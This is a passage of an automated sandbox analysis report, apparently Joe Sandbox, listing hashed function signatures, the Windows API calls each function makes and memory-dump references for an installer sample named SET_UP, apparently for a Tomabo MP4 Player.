• Instruction ID: fba1d6a314cef348a0d2546c7ce32fe115823ad611b91b4f624b73ed7c200e22
• Opcode Fuzzy Hash: 5656b2352a46bdfb2d43a6cfb516010bf3b6c067c8215d270e15ee12db318f5b
• Instruction Fuzzy Hash: 3E118235A00204ABCF10DF96CC81EAEBBB1FF48764F50C52EF919A7291C739A914CB58
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004AD52D
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004AD53B
                                                                                                                                                                                                  • InflateRect.USER32(?,00000001,00000001), ref: 004AD54A
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004AD551
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD565
                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 004AD56D
                                                                                                                                                                                                  • ValidateRect.USER32(00000000,?), ref: 004AD581
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Rect$ClientScreenWindow$InflateLongParentValidate
• String ID:
• API String ID: 2275295265-0
• Opcode ID: 47c81642d7a96463b12b34264baaaf0e5a9709322d72d894c312ec504b2f9cea
• Instruction ID: cdedafeb9cba1b8c08a18d6e1f0627bdf1464ef517b4a7ad831a88982853e5ac
• Opcode Fuzzy Hash: 47c81642d7a96463b12b34264baaaf0e5a9709322d72d894c312ec504b2f9cea
• Instruction Fuzzy Hash: 77F0AF76610202BFD3419B55DCC8EBF77BCEBD9724F40492AFA1992290D73498068B7B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Version$MessageRegisterWindow
• String ID: MSWHEEL_ROLLMSG
• API String ID: 303823969-2485103130
• Opcode ID: 7679aa96abb64beffaacab62027cdaf2503edbc6f5fb609b5f01762e7fbb8855
• Instruction ID: 8990738a53c23fc06bd50b624f1a4dcbef408eab377974a00eaf5b13ded63f4f
• Opcode Fuzzy Hash: 7679aa96abb64beffaacab62027cdaf2503edbc6f5fb609b5f01762e7fbb8855
• Instruction Fuzzy Hash: 84E048BE950217D6D6912B64AC44F7A26945BD87A4F51403FD900832549A6C08539FAF
APIs
• CreateProcessW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000230,00000000,00000000,?,?), ref: 0041C2D7
• WaitForSingleObject.KERNEL32(?,00000064), ref: 0041C2F5
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041C335
• GetExitCodeProcess.KERNEL32(?,?), ref: 0041C348
• CloseHandle.KERNEL32(?), ref: 0041C356
• CloseHandle.KERNEL32(?), ref: 0041C364
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CloseHandleObjectProcessSingleWait$CodeCreateExit
• String ID:
• API String ID: 4198832346-0
• Opcode ID: 08b69aa10bb556e8869df28e7a384f4b88b89f9d5f9a84f0440de7a8e817cef6
• Instruction ID: 89abd7f9de1a646779240ee680c9cae02997802c9b3a7940540ae61844de7f7c
• Opcode Fuzzy Hash: 08b69aa10bb556e8869df28e7a384f4b88b89f9d5f9a84f0440de7a8e817cef6
• Instruction Fuzzy Hash: A1416270540209EFCB218FA5DCC4DEF7BB4FF41754F14862AF92196290C7799984CB69
APIs
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: __aulldiv__aullrem
• String ID:
• API String ID: 3839614884-0
• Opcode ID: 4bc2be86f55033f30a126aad25af9f2db4e96640e493f3b6851394c0c132f75f
• Instruction ID: b33e5daed0ea927ced96e99162dffba0d0b2e8c3e0eaed78718e9b995b634fcb
• Opcode Fuzzy Hash: 4bc2be86f55033f30a126aad25af9f2db4e96640e493f3b6851394c0c132f75f
• Instruction Fuzzy Hash: 9531E471600349ABCF12AF598C809AF7F69FF91354F24047FF94197241D6749A2287AA
APIs
  • Part of subcall function 004811D0: lstrlenA.KERNEL32(?), ref: 004811F6
• lstrlenA.KERNEL32(?,FFFFFFFF,(:D,00000000,?,004765CB,(:D,?,00000080,00000000,?,?,FFFFFFFF), ref: 004814D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: lstrlen
• String ID: (:D$T$X$t$z
• API String ID: 1659193697-2820635847
• Opcode ID: 41dfabbf99ea7b7df54dbfb2317eba7605a4200135940f62b1bafd17f83dd4d7
• Instruction ID: 8c2c7358f666f417834f7ab87c6fa977113941ad10054ca79f27a75166bac67f
• Opcode Fuzzy Hash: 41dfabbf99ea7b7df54dbfb2317eba7605a4200135940f62b1bafd17f83dd4d7
• Instruction Fuzzy Hash: BF31C3715082406FD300EA59DC81DAFBBDCEFC6318F84495EF58842212D67DAA0A87B7
APIs
• __EH_prolog.LIBCMT ref: 00411A45
  • Part of subcall function 004B5633: GetWindowLongW.USER32(?,000000F0), ref: 004B563F
• GetWindowRect.USER32(?,?), ref: 00411A65
• GetParent.USER32(?), ref: 00411A6E
• GetDC.USER32(?), ref: 00411AA5
• GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 00411AD3
• ReleaseDC.USER32(?,?), ref: 00411AE7
  • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
  • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ClientScreenWindow$ExtentH_prologLongParentPoint32RectReleaseText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 571962570-0
                                                                                                                                                                                                  • Opcode ID: 4278cbf124fea2933a985958ee123705f27499e53cabb05641bcc78802bd9f8a
                                                                                                                                                                                                  • Instruction ID: 8d2c89178239ad370fc5376dfc587a43112afcfc56ae6882a07636a5d3a6d81d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4278cbf124fea2933a985958ee123705f27499e53cabb05641bcc78802bd9f8a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC311C71A00205AFDB04EFA5DD45EEEBBB9FF48314F044529F605932A1DB39AD41CB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D332
                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,?,?,0041F1F1,?,?,%s\%s\%s,?,Tomabo,MP4 Player,00508FBC), ref: 0041D33C
                                                                                                                                                                                                  • PathIsRootW.SHLWAPI(?,?,?,0041F1F1,?,?,%s\%s\%s,?,Tomabo,MP4 Player,00508FBC), ref: 0041D351
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Path$ExistsFileH_prologRoot
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2517856918-0
                                                                                                                                                                                                  • Opcode ID: 8f2ebb83ced8e5a72120ef0e4fd53c8888b9c5bdda017bc3262ff7e8bdff0888
                                                                                                                                                                                                  • Instruction ID: 562aaeb64256f8b58e6f634ff36a17b245561aa8b8edc4af6ed6ded62593b218
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2ebb83ced8e5a72120ef0e4fd53c8888b9c5bdda017bc3262ff7e8bdff0888
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD21B331900129ABDB24ABA1DC45FEE7B34EF00365F10062AF822B70E0DB785D45CA99
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetBkMode.GDI32(?), ref: 0041156F
                                                                                                                                                                                                  • GetBkColor.GDI32(?), ref: 0041157B
                                                                                                                                                                                                  • GetTextColor.GDI32(?), ref: 00411587
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00411593
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004115A8
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9641
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9655
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 004115D4
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ModeWindow$ClientColorScreen$MessageParentRectSendText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3864841213-0
                                                                                                                                                                                                  • Opcode ID: dc61acec43b64f84df1aefe5db42c46c2f628a9465cc6c38a379d504f22bcd26
                                                                                                                                                                                                  • Instruction ID: 4821f5afca3dfb1e93660dbd529fb6b1244d812143ae10136e2be1d90f711484
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc61acec43b64f84df1aefe5db42c46c2f628a9465cc6c38a379d504f22bcd26
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F211975A00219EFCF01AFA1CC48CDEBFB9FF08314B14442AFA45A2261CB35A961DF64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetBkMode.GDI32(?), ref: 00411B49
                                                                                                                                                                                                  • GetBkColor.GDI32(?), ref: 00411B55
                                                                                                                                                                                                  • GetTextColor.GDI32(?), ref: 00411B61
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00411B6D
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00411B82
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A40), ref: 004B97EF
                                                                                                                                                                                                    • Part of subcall function 004B97DB: ScreenToClient.USER32(?,75C04A48), ref: 004B97F8
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9641
                                                                                                                                                                                                    • Part of subcall function 004B961F: SetWindowOrgEx.GDI32(?,?,?,?), ref: 004B9655
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000014,?,00000000), ref: 00411BAE
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B9471
                                                                                                                                                                                                    • Part of subcall function 004B9458: SetBkMode.GDI32(00000000,?), ref: 004B947F
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ModeWindow$ClientColorScreen$MessageParentRectSendText
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3864841213-0
                                                                                                                                                                                                  • Opcode ID: 0bde473ff6e71d5d3702c2eb7c410b298ffa728bfeb746d1e2242625aa7ecf2e
                                                                                                                                                                                                  • Instruction ID: 090d479fc239463ad8ce79f623068e6c68db2b3612f4c561218a0c3d7ebabef7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bde473ff6e71d5d3702c2eb7c410b298ffa728bfeb746d1e2242625aa7ecf2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63210A75A00219EFCF019FA1CC48CDDBBB9FF08314B14442AFA45A6261DB35A961DB64
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(00000001), ref: 004BC75C
                                                                                                                                                                                                  • GetLastActivePopup.USER32(00000001), ref: 004BC76B
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000001), ref: 004BC780
                                                                                                                                                                                                  • EnableWindow.USER32(00000001,00000000), ref: 004BC793
                                                                                                                                                                                                  • GetWindowLongW.USER32(00000001,000000F0), ref: 004BC7A5
                                                                                                                                                                                                  • GetParent.USER32(00000001), ref: 004BC7B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
• String ID:
• API String ID: 670545878-0
• Opcode ID: cd665a56acac859c81cad6e84494ce98bdbd6ba8941d31be9124adf495a38751
• Instruction ID: 0e96f466775b7451a6b1b12101c63da0fe18ddbb2021faaaeb5ea3899b6651dc
• Opcode Fuzzy Hash: cd665a56acac859c81cad6e84494ce98bdbd6ba8941d31be9124adf495a38751
• Instruction Fuzzy Hash: E611A07260132357D6716A6A8CC4BABB3A89F55B52F15012BED10D7300DF68CC014AFD
APIs
• GetCommandLineW.KERNEL32(?,00000000,?,?,00496849), ref: 0049C63E
• GetCommandLineA.KERNEL32(?,00000000,?,?,00496849), ref: 0049C650
• GetCommandLineW.KERNEL32(?,00000000,?,?,00496849), ref: 0049C667
• GetCommandLineA.KERNEL32(?,00000000,?,?,00496849), ref: 0049C670
• MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,00496849), ref: 0049C689
• MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,00496849), ref: 0049C6AE
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: CommandLine$ByteCharMultiWide
• String ID:
• API String ID: 3068183746-0
• Opcode ID: 7e5e3954b1a23d64f22b34a945b44c96c98b1c7b1266085b3eb3063c29e2df61
• Instruction ID: 93f2e3e93b36880fd0f7827b03c5a9eea13c13eec9e3aa53fdf44c6a780e223b
• Opcode Fuzzy Hash: 7e5e3954b1a23d64f22b34a945b44c96c98b1c7b1266085b3eb3063c29e2df61
• Instruction Fuzzy Hash: 821108722082156AFF2057A59DC0F273F8CDBD1764F25113BF400D63E4DB59DC015AA9
APIs
• GetDesktopWindow.USER32 ref: 004C0C1A
• GetWindow.USER32(00000000), ref: 004C0C27
• GetWindowLongW.USER32(00000000,000000F0), ref: 004C0C5C
• ShowWindow.USER32(00000000,00000000), ref: 004C0C78
• ShowWindow.USER32(00000000,00000004), ref: 004C0C90
• GetWindow.USER32(00000000,00000002), ref: 004C0C99
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Window$Show$DesktopLong
• String ID:
• API String ID: 3178490500-0
• Opcode ID: 430f962a90fcccd45457f94de6ce1071c6e0d6d59ad9a3ada8bd92c95080c717
• Instruction ID: 24bc8152cec834558d1c4014925b01b6f9a9112cddf2dfad6deee1ecd03e4ccc
• Opcode Fuzzy Hash: 430f962a90fcccd45457f94de6ce1071c6e0d6d59ad9a3ada8bd92c95080c717
• Instruction Fuzzy Hash: 86110475902B15EBD2B59E25CE49F5F769C9F517A1F21032EF514922C0DB2CD80081AD
APIs
• RegDeleteKeyW.ADVAPI32(00000000,?), ref: 004BC3B3
• RegDeleteValueW.ADVAPI32(00000000,00000000,?), ref: 004BC3D3
• RegCloseKey.ADVAPI32(00000000), ref: 004BC408
  • Part of subcall function 004C4C88: RegOpenKeyExW.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4CB6
  • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CD9
  • Part of subcall function 004C4C88: RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,0002001F,00000000,?,00508FBC,?,?,00508FBC,AppFolder,00000000), ref: 004C4CF8
  • Part of subcall function 004C4C88: RegCloseKey.KERNEL32(?,?,?,00508FBC,AppFolder,00000000), ref: 004C4D08
  • Part of subcall function 004C4C88: RegCloseKey.ADVAPI32(00000000,?,?,00508FBC,AppFolder,00000000), ref: 004C4D12
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 004BC426
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
• String ID:
• API String ID: 1886894508-0
• Opcode ID: 67c1fa23525100f4d85c5587259d81082c873f270b0765e93623b6251f2916be
• Instruction ID: 129871d5cc2e96d6dd688fdf12bbee243eb27439d6e993f68968dc8034574302
• Opcode Fuzzy Hash: 67c1fa23525100f4d85c5587259d81082c873f270b0765e93623b6251f2916be
• Instruction Fuzzy Hash: 8A116036001525EBCF221F61CC98FEE3BA5EF04754F158426FD159A121C779C9229BAD
APIs
  • Part of subcall function 004B051D: ImageList_Create.COMCTL32(?,?,?,?,?), ref: 004B0532
• LoadIconW.USER32(?,000000C8), ref: 0040C632
• ImageList_ReplaceIcon.COMCTL32(?,?,00000000), ref: 0040C642
• LoadIconW.USER32(?,000000C9), ref: 0040C652
• ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000), ref: 0040C65C
• LoadIconW.USER32(?,000000CA), ref: 0040C66C
• ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,00000000,?,00000000), ref: 0040C676
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
Similarity
• API ID: Icon$ImageList_$LoadReplace$Create
• String ID:
• API String ID: 1174600510-0
• Opcode ID: 6a3c10639678ce6cabcfd295ee8d220f5186da441b4f9672c96504a596d16502
• Instruction ID: fbc3b05537a244330e7ecc86cf21687a35f9a1615d03bdc1d77b193306773529
• Opcode Fuzzy Hash: 6a3c10639678ce6cabcfd295ee8d220f5186da441b4f9672c96504a596d16502
• Instruction Fuzzy Hash: C30184712502087EE6706772CC85F67779CEB54368F05492AB615D71E2CAB5E8004638
APIs
• UnpackDDElParam.USER32(000003E8,?,?,?), ref: 004C186A
• GlobalLock.KERNEL32(?), ref: 004C1872
• lstrcpynW.KERNEL32(?,00000000,00000208), ref: 004C1885
• GlobalUnlock.KERNEL32(?), ref: 004C188E
• ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 004C18A6
• PostMessageW.USER32(?,000003E4,?,00000000), ref: 004C18B3
  • Part of subcall function 004B57CE: IsWindowEnabled.USER32(?), ref: 004B57D8
Memory Dump Source
• Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
